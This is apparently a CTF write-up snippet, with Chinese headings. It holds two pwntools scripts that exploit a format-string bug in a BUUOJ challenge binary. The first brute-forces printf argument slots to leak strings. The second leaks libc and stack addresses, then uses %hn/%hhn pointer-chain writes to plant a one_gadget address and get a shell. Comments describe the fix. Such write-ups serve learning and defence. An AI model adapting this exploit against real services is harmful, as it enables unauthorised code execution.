fmt模板


常见非预期解

# Leak walker for the format-string bug in this challenge: every outer iteration
# opens a fresh connection and reads three consecutive printf argument slots
# (10+3*i .. 10+3*i+2) as C strings via "%<k>$s", collecting each answer up to the
# '.' terminator. Relies on pwntools (`from pwn import *`), which this listing
# does not show.
# Defensive note: the leak exists only because user input is used as the format
# argument; printf("%s", buf) removes the whole bug class, and -Wformat-security
# flags the non-constant format at compile time.
for i in range(1, 100):
    try:
        # r=process('./pwn')
        r = remote('node4.buuoj.cn', 26477)
        elf = ELF('./pwn')  # loaded but never referenced in this snippet
        r.sendlineafter("Give me your name:", 's')
        for j in range(3):
            r.recvuntil("food: ")
            # "%<k>$s." dereferences slot k as a char*; presumably a slot holding a
            # non-pointer crashes the target, which then shows up here as EOFError.
            r.sendline('%' + str(10 + 3 * i + j) + '$s.')
            print(i, r.recvuntil(b'.', drop=True))
    except EOFError:
        # NOTE(review): r is never closed, so each connection is leaked until the
        # script exits; best-effort skip to the next slot group.
        pass

fmt不在栈上

from pwn import *
# Exploit for a format-string bug where the format lives outside the stack: the
# program passes user input straight to printf, so reads are done with %p and
# writes with %hn/%hhn through a pointer stored in a stack slot. Every constant
# below (libc delta, stack deltas, gadget offset, slot numbers) was taken from one
# specific build and debug session and cannot be derived from this snippet.
# Defensive note: printf("%s", buf) instead of printf(buf) blocks the whole chain;
# _FORTIFY_SOURCE=2 additionally aborts on %n with a format in writable memory.
context(os='linux',arch='amd64') #need tmux
context.log_level="debug"

# p = remote("node4.buuoj.cn", 26443)
p = process("./pwn")  # local target; the commented line above is the remote variant
# Presumably the string a later gadget consumes as a command — not verifiable here.
p.sendlineafter("Give me your name:", b"/bin/sh")

# Leak two stack slots as pointers (argument 9 and argument 11), '^'-separated.
p.sendlineafter("food:", b'%9$p^%11$p^')
# [10:-1] skips an echoed 10-character prefix plus the trailing '^'; that prefix
# is an assumption about the program's output format — confirm against the binary.
libc_base = int(p.recvuntil("^")[10:-1], 16) - 0x20750 - 240 # __libc_start_main
stack = int(p.recvuntil("^")[:-1], 16)
# Rebase a debug-time stack address (...ae40) onto the live stack using the leaked
# slot (...af08); only the delta between the two constants matters.
i_addr = stack - 0x7ffc0bd8af08 + 0x7ffc0bd8ae40
one = libc_base + 0x45226  # named like a one_gadget offset; confirm for the target libc
print(hex(one))
# Two-stage pointer-chain write, repeated three times below: "%11$hn" overwrites
# the low 16 bits of the pointer held in slot 11, and the following "%37$..n"
# writes through that pointer (slot 37 is presumably where that value is read back
# as an argument — confirm with a debugger). The count written is the number of
# characters emitted, so "%Np" with a small N writes the length of the printed
# pointer text rather than N.
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x30 + 4) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format(1))

# Low 16 bits of `one` into i_addr - 0x18.
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hn".format(one & 0xffff))

# Third byte of `one` into i_addr - 0x18 + 2; the upper bytes are left untouched.
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18 + 2) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format((one & 0xff0000) // 0x10000))
# NOTE(review): indentation was lost in this paste; the loop is assumed to wrap
# only the first send, with the final send outside it — confirm against the
# original script. Presumably these "1" answers drain the remaining prompts.
for i in range(8):
    p.sendlineafter("food:", "1")
# attach(p)
p.sendlineafter("food:", "1")
print(hex(libc_base))
p.interactive()